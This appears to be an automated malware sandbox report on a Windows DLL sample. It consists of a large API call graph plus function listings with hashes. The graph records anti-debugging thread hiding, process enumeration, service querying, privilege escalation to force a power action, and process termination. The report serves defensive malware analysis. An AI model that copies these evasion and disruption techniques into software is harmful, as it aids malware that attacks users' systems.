63678->63679 63679->63564 63680 6c07bc26 63679->63680 63681 6c07bc0f 63679->63681 63684 6c07bbbd _Yarn _strlen 63679->63684 63683 6c1fa133 std::_Facet_Register 4 API calls 63680->63683 63682 6c1fa133 std::_Facet_Register 4 API calls 63681->63682 63682->63684 63683->63684 63684->63581 63685 6c07c075 63684->63685 63686 6c07c08e 63684->63686 63689 6c07c028 _Yarn 63684->63689 63687 6c1fa133 std::_Facet_Register 4 API calls 63685->63687 63688 6c1fa133 std::_Facet_Register 4 API calls 63686->63688 63687->63689 63688->63689 63690 6c1f9050 104 API calls 63689->63690 63695 6c07c0db std::ios_base::_Ios_base_dtor _strlen 63690->63695 63691 6c07c7a5 63693 6c1fa133 std::_Facet_Register 4 API calls 63691->63693 63692 6c07c7bc 63694 6c1fa133 std::_Facet_Register 4 API calls 63692->63694 63702 6c07c753 _Yarn _strlen 63693->63702 63694->63702 63695->63564 63695->63691 63695->63692 63695->63702 63696 6c07d406 63699 6c1fa133 std::_Facet_Register 4 API calls 63696->63699 63697 6c07d3ed 63698 6c1fa133 std::_Facet_Register 4 API calls 63697->63698 63700 6c07d39a _Yarn 63698->63700 63699->63700 63701 6c1f9050 104 API calls 63700->63701 63703 6c07d458 std::ios_base::_Ios_base_dtor _strlen 63701->63703 63702->63581 63702->63696 63702->63697 63702->63700 63708 6c07cb2f 63702->63708 63703->63564 63704 6c07d8a4 63703->63704 63705 6c07d8bb 63703->63705 63709 6c07d852 _Yarn _strlen 63703->63709 63706 6c1fa133 std::_Facet_Register 4 API calls 63704->63706 63707 6c1fa133 std::_Facet_Register 4 API calls 63705->63707 63706->63709 63707->63709 63709->63581 63710 6c07dcb6 63709->63710 63711 6c07dccf 63709->63711 63714 6c07dc69 _Yarn 63709->63714 63712 6c1fa133 std::_Facet_Register 4 API calls 63710->63712 63713 6c1fa133 std::_Facet_Register 4 API calls 63711->63713 63712->63714 63713->63714 63715 6c1f9050 104 API calls 63714->63715 63717 6c07dd1c std::ios_base::_Ios_base_dtor 63715->63717 63716 6c1f86e0 4 API calls 63716->63645 63717->63564 63717->63716 63719 6c1fa138 63718->63719 63720 6c1fa152 63719->63720 63723 6c1fa154 std::_Facet_Register 63719->63723 63827 6c202704 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63719->63827 63720->63562 63722 6c1fafb3 std::_Facet_Register 63831 6c1fca69 RaiseException 63722->63831 63723->63722 63828 6c1fca69 RaiseException 63723->63828 63725 6c1fb7ac IsProcessorFeaturePresent 63731 6c1fb7d1 63725->63731 63727 6c1faf73 63829 6c1fca69 RaiseException 63727->63829 63729 6c1faf93 std::invalid_argument::invalid_argument 63830 6c1fca69 RaiseException 63729->63830 63731->63562 63733 6c1ee0a6 FindFirstFileA 63732->63733 63734 6c1ee0a4 63732->63734 63735 6c1ee0e0 63733->63735 63734->63733 63736 6c1ee13c 63735->63736 63737 6c1ee0e2 FindClose 63735->63737 63736->63568 63737->63735 63740 6c1f8846 63738->63740 63739 6c1f88be OpenServiceA 63739->63740 63740->63739 63741 6c1f8922 63740->63741 63741->63613 63747 6c1e0893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63742->63747 63743 6c1e4e71 CloseHandle 63743->63747 63744 6c0837cb 63749 6c1f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63744->63749 63745 6c1e3bd1 CloseHandle 63745->63747 63746 6c1ccea0 WriteFile ReadFile WriteFile WriteFile 63746->63747 63747->63743 63747->63744 63747->63745 63747->63746 63832 6c1cc390 63747->63832 63749->63579 63751 6c096bd5 63750->63751 63843 6c0c2020 63751->63843 63753 6c096c68 63754 6c1fa133 std::_Facet_Register 4 API calls 63753->63754 63755 6c096ca0 63754->63755 63860 6c1faa17 63755->63860 63757 6c096cb4 63872 6c0c1d90 63757->63872 63760 6c096d8e 63760->63624 63762 6c096dc8 63880 6c0c26e0 24 API calls 4 library calls 63762->63880 63764 6c096dda 63881 6c1fca69 RaiseException 63764->63881 63766 6c096def 63882 6c0be010 67 API calls 63766->63882 63768 6c096e0f 63768->63624 63771 6c096e9f 63769->63771 63770 6c096eb3 63774 6c096f5b 63770->63774 64274 6c0c2250 30 API calls 63770->64274 64275 6c0c26e0 24 API calls 4 library calls 63770->64275 64276 6c1fca69 RaiseException 63770->64276 63771->63770 64272 6c0c3560 32 API calls std::_Xinvalid_argument 63771->64272 63775 6c096f6e 63774->63775 64273 6c0c37e0 32 API calls std::_Xinvalid_argument 63774->64273 63775->63624 63780 6c09709e 63779->63780 63784 6c0970d1 63779->63784 64277 6c0c01f0 63780->64277 63782 6c097183 63782->63613 63784->63782 64281 6c0c2250 30 API calls 63784->64281 63785 6c204208 67 API calls 63785->63784 63787 6c0971ae 64282 6c0c2340 24 API calls 63787->64282 63789 6c0971be 64283 6c1fca69 RaiseException 63789->64283 63791 6c0971c9 63792->63613 63793->63608 63795 6c1f8770 63794->63795 63796 6c1f87b0 WaitForSingleObject CloseHandle CloseHandle 63795->63796 63797 6c1f87a4 63795->63797 63796->63795 63797->63617 63798->63628 63800 6c1f90a7 63799->63800 64329 6c1f96e0 63800->64329 63802 6c1f90b8 63803 6c096ba0 104 API calls 63802->63803 63809 6c1f90dc 63803->63809 63804 6c1f9157 64381 6c0be010 67 API calls 63804->64381 63806 6c1f918f std::ios_base::_Ios_base_dtor 64382 6c0be010 67 API calls 63806->64382 63809->63804 63810 6c1f9144 63809->63810 64348 6c1f9a30 63809->64348 64356 6c0d3010 63809->64356 64366 6c1f9280 63810->64366 63811 6c1f91d2 std::ios_base::_Ios_base_dtor 63811->63667 63814 6c1f914c 63815 6c097090 77 API calls 63814->63815 63815->63804 63816->63657 63820 6c1f8966 std::locale::_Setgloballocale 63817->63820 63818 6c1f8a64 Process32NextW 63818->63820 63819 6c1f8a14 CloseHandle 63819->63820 63820->63818 63820->63819 63821 6c1f8a45 Process32FirstW 63820->63821 63822 6c1f8a96 63820->63822 63821->63820 63822->63587 63823->63604 63824->63624 63826->63585 63827->63719 63828->63727 63829->63729 63830->63722 63831->63725 63833 6c1cc3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 63832->63833 63834 6c1cce3c 63833->63834 63835 6c1ccab9 CreateFileA 63833->63835 63837 6c1cb4d0 63833->63837 63834->63747 63835->63833 63838 6c1cb4e3 __wsopen_s std::locale::_Setgloballocale 63837->63838 63839 6c1cc206 WriteFile 63838->63839 63840 6c1cc377 63838->63840 63841 6c1cb619 WriteFile 63838->63841 63842 6c1cbc23 ReadFile 63838->63842 63839->63838 63840->63833 63841->63838 63842->63838 63844 6c1fa133 std::_Facet_Register 4 API calls 63843->63844 63845 6c0c207e 63844->63845 63846 6c1faa17 43 API calls 63845->63846 63847 6c0c2092 63846->63847 63883 6c0c2f60 42 API calls 4 library calls 63847->63883 63849 6c0c20c8 63850 6c0c210d 63849->63850 63851 6c0c2136 63849->63851 63854 6c0c2120 63850->63854 63884 6c1fa67e 9 API calls 2 library calls 63850->63884 63885 6c0c2250 30 API calls 63851->63885 63854->63753 63855 6c0c215b 63886 6c0c2340 24 API calls 63855->63886 63857 6c0c2171 63887 6c1fca69 RaiseException 63857->63887 63859 6c0c217c 63859->63753 63861 6c1faa23 __EH_prolog3 63860->63861 63888 6c1fa5a5 63861->63888 63864 6c1faa5f 63894 6c1fa5d6 63864->63894 63867 6c1faa41 63902 6c1faaaa 39 API calls std::locale::_Setgloballocale 63867->63902 63869 6c1faa9c 63869->63757 63870 6c1faa49 63903 6c1fa8a1 HeapFree GetLastError _Yarn 63870->63903 63873 6c0c1ddc 63872->63873 63874 6c096d5d 63872->63874 63908 6c1fab37 63873->63908 63874->63760 63879 6c0c2250 30 API calls 63874->63879 63878 6c0c1e82 63879->63762 63880->63764 63881->63766 63882->63768 63883->63849 63884->63854 63885->63855 63886->63857 63887->63859 63889 6c1fa5bb 63888->63889 63890 6c1fa5b4 63888->63890 63892 6c1fa5b9 63889->63892 63905 6c1fbc7b EnterCriticalSection 63889->63905 63904 6c203abd 6 API calls std::_Lockit::_Lockit 63890->63904 63892->63864 63901 6c1fa920 6 API calls 2 library calls 63892->63901 63895 6c203acb 63894->63895 63896 6c1fa5e0 63894->63896 63907 6c203aa6 LeaveCriticalSection 63895->63907 63900 6c1fa5f3 63896->63900 63906 6c1fbc89 LeaveCriticalSection 63896->63906 63899 6c203ad2 63899->63869 63900->63869 63901->63867 63902->63870 63903->63864 63904->63892 63905->63892 63906->63900 63907->63899 63909 6c1fab40 63908->63909 63910 6c0c1dea 63909->63910 63917 6c20343a 63909->63917 63910->63874 63916 6c1ffc53 18 API calls __Getctype 63910->63916 63912 6c1fab8c 63912->63910 63928 6c203148 65 API calls 63912->63928 63914 6c1faba7 63914->63910 63929 6c204208 63914->63929 63916->63878 63918 6c203445 __wsopen_s 63917->63918 63919 6c203478 63918->63919 63920 6c203458 63918->63920 63924 6c203468 63919->63924 63940 6c20e4fc 63919->63940 63954 6c203810 18 API calls __Getctype 63920->63954 63924->63912 63928->63914 63930 6c204214 __wsopen_s 63929->63930 63931 6c204233 63930->63931 63932 6c20421e 63930->63932 63936 6c20422e 63931->63936 64135 6c1ffc99 EnterCriticalSection 63931->64135 64150 6c203810 18 API calls __Getctype 63932->64150 63935 6c204250 64136 6c20428c 63935->64136 63936->63910 63938 6c20425b 64151 6c204282 LeaveCriticalSection 63938->64151 63941 6c20e508 __wsopen_s 63940->63941 63956 6c203a8f EnterCriticalSection 63941->63956 63943 6c20e516 63957 6c20e5a0 63943->63957 63948 6c20e662 63949 6c20e781 63948->63949 63981 6c20e804 63949->63981 63952 6c2034bc 63955 6c2034e5 LeaveCriticalSection 63952->63955 63954->63924 63955->63924 63956->63943 63964 6c20e5c3 63957->63964 63958 6c20e523 63971 6c20e55c 63958->63971 63959 6c20e61b 63976 6c20a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63959->63976 63961 6c20e624 63977 6c207eab HeapFree GetLastError __dosmaperr 63961->63977 63964->63958 63964->63959 63974 6c1ffc99 EnterCriticalSection 63964->63974 63975 6c1ffcad LeaveCriticalSection 63964->63975 63965 6c20e62d 63965->63958 63978 6c20a30f 6 API calls std::_Lockit::_Lockit 63965->63978 63967 6c20e64c 63979 6c1ffc99 EnterCriticalSection 63967->63979 63970 6c20e65f 63970->63958 63980 6c203aa6 LeaveCriticalSection 63971->63980 63973 6c203493 63973->63924 63973->63948 63974->63964 63975->63964 63976->63961 63977->63965 63978->63967 63979->63970 63980->63973 63982 6c20e823 63981->63982 63983 6c20e836 63982->63983 63987 6c20e84b 63982->63987 63997 6c203810 18 API calls __Getctype 63983->63997 63985 6c20e797 63985->63952 63994 6c2176ce 63985->63994 63987->63987 63990 6c20e96b 63987->63990 63998 6c217598 37 API calls __Getctype 63987->63998 63989 6c20e9bb 63989->63990 63999 6c217598 37 API calls __Getctype 63989->63999 63990->63985 64001 6c203810 18 API calls __Getctype 63990->64001 63992 6c20e9d9 63992->63990 64000 6c217598 37 API calls __Getctype 63992->64000 64002 6c217a86 63994->64002 63997->63985 63998->63989 63999->63992 64000->63990 64001->63985 64004 6c217a92 __wsopen_s 64002->64004 64003 6c217a99 64020 6c203810 18 API calls __Getctype 64003->64020 64004->64003 64005 6c217ac4 64004->64005 64011 6c2176ee 64005->64011 64010 6c2176e9 64010->63952 64022 6c203dbb 64011->64022 64017 6c217724 64018 6c217756 64017->64018 64062 6c207eab HeapFree GetLastError __dosmaperr 64017->64062 64021 6c217b1b LeaveCriticalSection __wsopen_s 64018->64021 64020->64010 64021->64010 64063 6c1ff3db 64022->64063 64025 6c203ddf 64027 6c1ff4e6 64025->64027 64072 6c1ff53e 64027->64072 64029 6c1ff4fe 64029->64017 64030 6c21775c 64029->64030 64087 6c217bdc 64030->64087 64036 6c217882 GetFileType 64039 6c2178d4 64036->64039 64040 6c21788d GetLastError 64036->64040 64037 6c217805 64037->64036 64038 6c217857 GetLastError 64037->64038 64115 6c217b47 CreateFileW 64037->64115 64053 6c21778e __dosmaperr 64038->64053 64117 6c214ea0 SetStdHandle __dosmaperr __wsopen_s 64039->64117 64116 6c2030e2 __dosmaperr 64040->64116 64043 6c21789b CloseHandle 64043->64053 64059 6c2178c4 64043->64059 64045 6c21784a 64045->64036 64045->64038 64046 6c2178f5 64047 6c217941 64046->64047 64118 6c217d56 70 API calls 2 library calls 64046->64118 64051 6c217948 64047->64051 64132 6c217e00 70 API calls 2 library calls 64047->64132 64050 6c217976 64050->64051 64052 6c217984 64050->64052 64119 6c20f015 64051->64119 64052->64053 64055 6c217a00 CloseHandle 64052->64055 64053->64017 64133 6c217b47 CreateFileW 64055->64133 64057 6c217a2b 64058 6c217a35 GetLastError 64057->64058 64057->64059 64060 6c217a41 __dosmaperr 64058->64060 64059->64053 64134 6c214e0f SetStdHandle __dosmaperr __wsopen_s 64060->64134 64062->64018 64064 6c1ff3fb 64063->64064 64070 6c1ff3f2 64063->64070 64065 6c2080a2 __Getctype 37 API calls 64064->64065 64064->64070 64066 6c1ff41b 64065->64066 64067 6c208618 __Getctype 37 API calls 64066->64067 64068 6c1ff431 64067->64068 64069 6c208645 __fassign 37 API calls 64068->64069 64069->64070 64070->64025 64071 6c20a0c5 5 API calls std::_Lockit::_Lockit 64070->64071 64071->64025 64073 6c1ff54c 64072->64073 64074 6c1ff566 64072->64074 64077 6c1ff4cc __wsopen_s HeapFree GetLastError 64073->64077 64075 6c1ff56d 64074->64075 64076 6c1ff58c 64074->64076 64079 6c1ff48d __wsopen_s HeapFree GetLastError 64075->64079 64083 6c1ff556 __dosmaperr 64075->64083 64078 6c207f33 __fassign MultiByteToWideChar 64076->64078 64077->64083 64080 6c1ff59b 64078->64080 64079->64083 64081 6c1ff5a2 GetLastError 64080->64081 64082 6c1ff5c8 64080->64082 64084 6c1ff48d __wsopen_s HeapFree GetLastError 64080->64084 64081->64083 64082->64083 64085 6c207f33 __fassign MultiByteToWideChar 64082->64085 64083->64029 64084->64082 64086 6c1ff5df 64085->64086 64086->64081 64086->64083 64088 6c217c17 64087->64088 64090 6c217bfd 64087->64090 64089 6c217b6c __wsopen_s 18 API calls 64088->64089 64094 6c217c4f 64089->64094 64090->64088 64091 6c203810 __Getctype 18 API calls 64090->64091 64091->64088 64092 6c217c7e 64093 6c219001 __wsopen_s 18 API calls 64092->64093 64095 6c217779 64092->64095 64096 6c217ccc 64093->64096 64094->64092 64098 6c203810 __Getctype 18 API calls 64094->64098 64095->64053 64101 6c214cfc 64095->64101 64096->64095 64097 6c217d49 64096->64097 64099 6c20383d __Getctype 11 API calls 64097->64099 64098->64092 64100 6c217d55 64099->64100 64102 6c214d08 __wsopen_s 64101->64102 64103 6c203a8f std::_Lockit::_Lockit EnterCriticalSection 64102->64103 64108 6c214d0f 64103->64108 64104 6c214d34 64106 6c214f32 __wsopen_s 11 API calls 64104->64106 64105 6c214e06 __wsopen_s LeaveCriticalSection 64107 6c214d76 64105->64107 64109 6c214d39 64106->64109 64107->64053 64114 6c217b47 CreateFileW 64107->64114 64108->64104 64110 6c214da3 EnterCriticalSection 64108->64110 64111 6c214d56 64108->64111 64109->64111 64113 6c215080 __wsopen_s EnterCriticalSection 64109->64113 64110->64111 64112 6c214db0 LeaveCriticalSection 64110->64112 64111->64105 64112->64108 64113->64111 64114->64037 64115->64045 64116->64043 64117->64046 64118->64047 64120 6c214c92 __wsopen_s 18 API calls 64119->64120 64122 6c20f025 64120->64122 64121 6c20f02b 64123 6c214e0f __wsopen_s SetStdHandle 64121->64123 64122->64121 64125 6c214c92 __wsopen_s 18 API calls 64122->64125 64131 6c20f05d 64122->64131 64124 6c20f083 __dosmaperr 64123->64124 64124->64053 64127 6c20f054 64125->64127 64126 6c214c92 __wsopen_s 18 API calls 64128 6c20f069 CloseHandle 64126->64128 64129 6c214c92 __wsopen_s 18 API calls 64127->64129 64128->64121 64130 6c20f075 GetLastError 64128->64130 64129->64131 64130->64121 64131->64121 64131->64126 64132->64050 64133->64057 64134->64059 64135->63935 64137 6c204299 64136->64137 64138 6c2042ae 64136->64138 64174 6c203810 18 API calls __Getctype 64137->64174 64141 6c2042a9 64138->64141 64152 6c2043a9 64138->64152 64141->63938 64146 6c2042d1 64167 6c20ef88 64146->64167 64148 6c2042d7 64148->64141 64175 6c207eab HeapFree GetLastError __dosmaperr 64148->64175 64150->63936 64151->63936 64153 6c2043c1 64152->64153 64154 6c2042c3 64152->64154 64153->64154 64155 6c20d350 18 API calls 64153->64155 64158 6c20be2e 64154->64158 64156 6c2043df 64155->64156 64176 6c20f25c 64156->64176 64159 6c20be45 64158->64159 64160 6c2042cb 64158->64160 64159->64160 64259 6c207eab HeapFree GetLastError __dosmaperr 64159->64259 64162 6c20d350 64160->64162 64163 6c20d371 64162->64163 64164 6c20d35c 64162->64164 64163->64146 64260 6c203810 18 API calls __Getctype 64164->64260 64166 6c20d36c 64166->64146 64168 6c20efae 64167->64168 64172 6c20ef99 __dosmaperr 64167->64172 64169 6c20efd5 64168->64169 64171 6c20eff7 __dosmaperr 64168->64171 64261 6c20f0b1 64169->64261 64269 6c203810 18 API calls __Getctype 64171->64269 64172->64148 64174->64141 64175->64141 64177 6c20f268 __wsopen_s 64176->64177 64178 6c20f2ba 64177->64178 64179 6c20f270 __dosmaperr 64177->64179 64181 6c20f323 __dosmaperr 64177->64181 64187 6c215080 EnterCriticalSection 64178->64187 64179->64154 64217 6c203810 18 API calls __Getctype 64181->64217 64182 6c20f2c0 64185 6c20f2dc __dosmaperr 64182->64185 64188 6c20f34e 64182->64188 64216 6c20f31b LeaveCriticalSection __wsopen_s 64185->64216 64187->64182 64189 6c20f370 64188->64189 64215 6c20f38c __dosmaperr 64188->64215 64190 6c20f3c4 64189->64190 64192 6c20f374 __dosmaperr 64189->64192 64191 6c20f3d7 64190->64191 64226 6c20e359 20 API calls __wsopen_s 64190->64226 64218 6c20f530 64191->64218 64225 6c203810 18 API calls __Getctype 64192->64225 64197 6c20f42c 64199 6c20f440 64197->64199 64200 6c20f485 WriteFile 64197->64200 64198 6c20f3ed 64201 6c20f3f1 64198->64201 64202 6c20f416 64198->64202 64205 6c20f475 64199->64205 64206 6c20f44b 64199->64206 64203 6c20f4a9 GetLastError 64200->64203 64200->64215 64201->64215 64227 6c20f94b 6 API calls __wsopen_s 64201->64227 64228 6c20f5a1 43 API calls 5 library calls 64202->64228 64203->64215 64231 6c20f9b3 7 API calls 2 library calls 64205->64231 64208 6c20f450 64206->64208 64209 6c20f465 64206->64209 64212 6c20f455 64208->64212 64208->64215 64230 6c20fb77 8 API calls 3 library calls 64209->64230 64211 6c20f463 64211->64215 64229 6c20fa8e 7 API calls 2 library calls 64212->64229 64215->64185 64216->64179 64217->64179 64219 6c2150d5 __wsopen_s 18 API calls 64218->64219 64220 6c20f541 64219->64220 64221 6c20f3e8 64220->64221 64232 6c2080a2 GetLastError 64220->64232 64221->64197 64221->64198 64224 6c20f57e GetConsoleMode 64224->64221 64225->64215 64226->64191 64227->64215 64228->64215 64229->64211 64230->64211 64231->64211 64233 6c2080bf 64232->64233 64234 6c2080b9 64232->64234 64235 6c20a252 __Getctype 6 API calls 64233->64235 64239 6c2080c5 SetLastError 64233->64239 64236 6c20a213 __Getctype 6 API calls 64234->64236 64237 6c2080dd 64235->64237 64236->64233 64238 6c2080e1 64237->64238 64237->64239 64240 6c20a8d5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 64238->64240 64245 6c208153 64239->64245 64246 6c208159 64239->64246 64241 6c2080ed 64240->64241 64243 6c2080f5 64241->64243 64244 6c20810c 64241->64244 64247 6c20a252 __Getctype 6 API calls 64243->64247 64249 6c20a252 __Getctype 6 API calls 64244->64249 64245->64221 64245->64224 64248 6c2041b9 __Getctype 35 API calls 64246->64248 64250 6c208103 64247->64250 64251 6c20815e 64248->64251 64252 6c208118 64249->64252 64256 6c207eab _free HeapFree GetLastError 64250->64256 64253 6c20811c 64252->64253 64254 6c20812d 64252->64254 64255 6c20a252 __Getctype 6 API calls 64253->64255 64258 6c207eab _free HeapFree GetLastError 64254->64258 64255->64250 64257 6c208109 64256->64257 64257->64239 64258->64257 64259->64160 64260->64166 64262 6c20f0bd __wsopen_s 64261->64262 64270 6c215080 EnterCriticalSection 64262->64270 64264 6c20f0cb 64265 6c20f0f8 64264->64265 64266 6c20f015 __wsopen_s 21 API calls 64264->64266 64271 6c20f131 LeaveCriticalSection __wsopen_s 64265->64271 64266->64265 64268 6c20f11a 64268->64172 64269->64172 64270->64264 64271->64268 64272->63770 64273->63775 64274->63770 64275->63770 64276->63770 64278 6c0c022e 64277->64278 64279 6c0970c4 64278->64279 64284 6c204ecb 64278->64284 64279->63785 64281->63787 64282->63789 64283->63791 64285 6c204ef6 64284->64285 64286 6c204ed9 64284->64286 64285->64278 64286->64285 64287 6c204ee6 64286->64287 64288 6c204efa 64286->64288 64300 6c203810 18 API calls __Getctype 64287->64300 64292 6c2050f2 64288->64292 64293 6c2050fe __wsopen_s 64292->64293 64301 6c1ffc99 EnterCriticalSection 64293->64301 64295 6c20510c 64302 6c2050af 64295->64302 64299 6c204f2c 64299->64278 64300->64285 64301->64295 64310 6c20bc96 64302->64310 64308 6c2050e9 64309 6c205141 LeaveCriticalSection 64308->64309 64309->64299 64311 6c20d350 18 API calls 64310->64311 64312 6c20bca7 64311->64312 64313 6c2150d5 __wsopen_s 18 API calls 64312->64313 64315 6c20bcad __wsopen_s 64313->64315 64314 6c2050c3 64317 6c204f2e 64314->64317 64315->64314 64327 6c207eab HeapFree GetLastError __dosmaperr 64315->64327 64319 6c204f40 64317->64319 64321 6c204f5e 64317->64321 64318 6c204f4e 64328 6c203810 18 API calls __Getctype 64318->64328 64319->64318 64319->64321 64324 6c204f76 _Yarn 64319->64324 64326 6c20bd49 62 API calls 64321->64326 64322 6c2043a9 62 API calls 64322->64324 64323 6c20d350 18 API calls 64323->64324 64324->64321 64324->64322 64324->64323 64325 6c20f25c __wsopen_s 62 API calls 64324->64325 64325->64324 64326->64308 64327->64314 64328->64321 64330 6c1f9715 64329->64330 64331 6c0c2020 52 API calls 64330->64331 64332 6c1f97b6 64331->64332 64333 6c1fa133 std::_Facet_Register 4 API calls 64332->64333 64334 6c1f97ee 64333->64334 64335 6c1faa17 43 API calls 64334->64335 64336 6c1f9802 64335->64336 64337 6c0c1d90 89 API calls 64336->64337 64338 6c1f98ab 64337->64338 64339 6c1f98dc 64338->64339 64383 6c0c2250 30 API calls 64338->64383 64339->63802 64341 6c1f9916 64384 6c0c26e0 24 API calls 4 library calls 64341->64384 64343 6c1f9928 64385 6c1fca69 RaiseException 64343->64385 64345 6c1f993d 64386 6c0be010 67 API calls 64345->64386 64347 6c1f994f 64347->63802 64349 6c1f9a7d 64348->64349 64387 6c1f9c90 64349->64387 64351 6c1f9b6c 64351->63809 64354 6c1f9a95 64354->64351 64405 6c0c2250 30 API calls 64354->64405 64406 6c0c26e0 24 API calls 4 library calls 64354->64406 64407 6c1fca69 RaiseException 64354->64407 64357 6c0d304f 64356->64357 64361 6c0d3063 64357->64361 64416 6c0c3560 32 API calls std::_Xinvalid_argument 64357->64416 64360 6c0d311e 64363 6c0d3131 64360->64363 64417 6c0c37e0 32 API calls std::_Xinvalid_argument 64360->64417 64361->64360 64418 6c0c2250 30 API calls 64361->64418 64419 6c0c26e0 24 API calls 4 library calls 64361->64419 64420 6c1fca69 RaiseException 64361->64420 64363->63809 64367 6c1f928e 64366->64367 64370 6c1f92c1 64366->64370 64369 6c0c01f0 64 API calls 64367->64369 64368 6c1f9373 64368->63814 64371 6c1f92b4 64369->64371 64370->64368 64421 6c0c2250 30 API calls 64370->64421 64373 6c204208 67 API calls 64371->64373 64373->64370 64374 6c1f939e 64422 6c0c2340 24 API calls 64374->64422 64376 6c1f93ae 64423 6c1fca69 RaiseException 64376->64423 64378 6c1f93b9 64424 6c0be010 67 API calls 64378->64424 64380 6c1f9412 std::ios_base::_Ios_base_dtor 64380->63814 64381->63806 64382->63811 64383->64341 64384->64343 64385->64345 64386->64347 64388 6c1f9ccc 64387->64388 64389 6c1f9cf8 64387->64389 64390 6c1f9cf1 64388->64390 64410 6c0c2250 30 API calls 64388->64410 64395 6c1f9d09 64389->64395 64408 6c0c3560 32 API calls std::_Xinvalid_argument 64389->64408 64390->64354 64393 6c1f9ed8 64411 6c0c2340 24 API calls 64393->64411 64395->64390 64409 6c0c2f60 42 API calls 4 library calls 64395->64409 64396 6c1f9ee7 64412 6c1fca69 RaiseException 64396->64412 64400 6c1f9f17 64414 6c0c2340 24 API calls 64400->64414 64402 6c1f9f2d 64415 6c1fca69 RaiseException 64402->64415 64404 6c1f9d43 64404->64390 64413 6c0c2250 30 API calls 64404->64413 64405->64354 64406->64354 64407->64354 64408->64395 64409->64404 64410->64393 64411->64396 64412->64404 64413->64400 64414->64402 64415->64390 64416->64361 64417->64363 64418->64361 64419->64361 64420->64361 64421->64374 64422->64376 64423->64378 64424->64380 64425 6c073d62 64427 6c073bc0 64425->64427 64426 6c073e8a GetCurrentThread NtSetInformationThread 64428 6c073eea 64426->64428 64427->64426 64429 6c08f150 64431 6c08efbe 64429->64431 64430 6c08f243 CreateFileA 64434 6c08f2a7 64430->64434 64431->64430 64432 6c0902ca 64433 6c0902ac GetCurrentProcess TerminateProcess 64433->64432 64434->64432 64434->64433 64435 6c20262f 64436 6c20263b __wsopen_s 64435->64436 64437 6c202642 GetLastError ExitThread 64436->64437 64438 6c20264f 64436->64438 64439 6c2080a2 __Getctype 37 API calls 64438->64439 64440 6c202654 64439->64440 64447 6c20d456 64440->64447 64443 6c20266b 64453 6c20259a 16 API calls 2 library calls 64443->64453 64446 6c20268d 64448 6c20265f 64447->64448 64449 6c20d468 GetPEB 64447->64449 64448->64443 64452 6c20a45f 5 API calls std::_Lockit::_Lockit 64448->64452 64449->64448 64450 6c20d47b 64449->64450 64454 6c20a508 5 API calls std::_Lockit::_Lockit 64450->64454 64452->64443 64453->64446 64454->64448

                                              Executed Functions

                                              Function 6C074754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: HR^
                                              • API String ID: 4218353326-1341859651
                                              • Opcode ID: b71220695ef09e9a6b66b036ffba22f7de04717df49750cc91dcf38deb6b1ce0
                                              • Instruction ID: 340cb61cddf92042de6c2bed7097d4626c766a6586cab1cd1dddb91ab01024a2
                                              • Opcode Fuzzy Hash: b71220695ef09e9a6b66b036ffba22f7de04717df49750cc91dcf38deb6b1ce0
                                              • Instruction Fuzzy Hash: 0F741471645B028FC738CF28C8D0795B7F2EF85318B598A2DC0A68BB55EB74B54ACB50
                                              Function 6C1F8930 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4604 6c1f8930-6c1f8964 CreateToolhelp32Snapshot 4605 6c1f8980-6c1f8989 4604->4605 4606 6c1f898b-6c1f8990 4605->4606 4607 6c1f89d0-6c1f89d5 4605->4607 4610 6c1f8a0d-6c1f8a12 4606->4610 4611 6c1f8992-6c1f8997 4606->4611 4608 6c1f89d7-6c1f89dc 4607->4608 4609 6c1f8a34-6c1f8a62 call 6c1ff010 Process32FirstW 4607->4609 4612 6c1f8a64-6c1f8a71 Process32NextW 4608->4612 4613 6c1f89e2-6c1f89e7 4608->4613 4621 6c1f8a76-6c1f8a86 4609->4621 4614 6c1f8a8b-6c1f8a90 4610->4614 4615 6c1f8a14-6c1f8a2f CloseHandle 4610->4615 4617 6c1f8999-6c1f899e 4611->4617 4618 6c1f8966-6c1f8973 4611->4618 4612->4621 4613->4605 4619 6c1f89e9-6c1f8a08 4613->4619 4614->4605 4622 6c1f8a96-6c1f8aa4 4614->4622 4615->4605 4617->4605 4623 6c1f89a0-6c1f89ca call 6c2062f5 4617->4623 4618->4605 4619->4605 4621->4605 4623->4605
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C1F893E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
